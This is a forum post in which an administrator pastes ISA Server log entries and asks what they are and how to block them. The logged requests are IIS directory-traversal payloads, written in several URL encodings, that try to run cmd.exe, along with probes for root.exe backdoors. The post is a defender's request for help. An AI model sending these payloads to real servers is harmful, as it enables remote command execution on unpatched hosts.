Hi All, Can anyone let me know as how we can block these strange entries in my ISA Log. What is someone exactly trying to execute? What should be done to block these entries?I have ISA in integrated mode with win2k server fully patched. xxx.xxx.xxx.xxx anonymous - N 2002-03-10 06:55:16 W3ReverseProxy ISAICR - - - - - - 97 - TCP GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir 401 - 12202 0 Default rule - xxx.xxx.xxx.xxx anonymous - N 2002-03-10 06:55:18 W3ReverseProxy ISAICR - - - - - - 97 - TCP GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir 401 - 12202 0 Default rule - xxx.xxx.xxx.xxx anonymous - N 2002-03-10 06:55:19 W3ReverseProxy ISAICR - - - - - - 98 - TCP GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir 401 - 12202 0 Default rule - xxx.xxx.xxx.xxx anonymous - N 2002-03-10 06:55:21 W3ReverseProxy ISAICR - - - - - - 96 - TCP GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir 401 - 12202 0 Default rule - xxx.xxx.xxx.xxx anonymous - N 2002-03-10 06:55:23 W3ReverseProxy ISAICR - - - - - - 100 - TCP GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir 401 - 12202 0 Default rule - xxx.xxx.xxx.xxx anonymous - N 2002-03-10 06:55:25 W3ReverseProxy ISAICR - - - - - - 96 - TCP GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir - 12202 0 Default rule - xxx.xxx.xxx.xxx anonymous - N 2002-03-10 12:47:07 W3ReverseProxy ISAICR - - - - - - 72 - TCP GET /scripts/root.exe?/c+dir - - 12202 0 Default rule - xxx.xxx.xxx.xxx anonymous - N 2002-03-10 12:47:09 W3ReverseProxy ISAICR - - - - - - 70 - TCP GET /MSADC/root.exe?/c+dir - - 12202 0 Default rule - Regards, Vinay.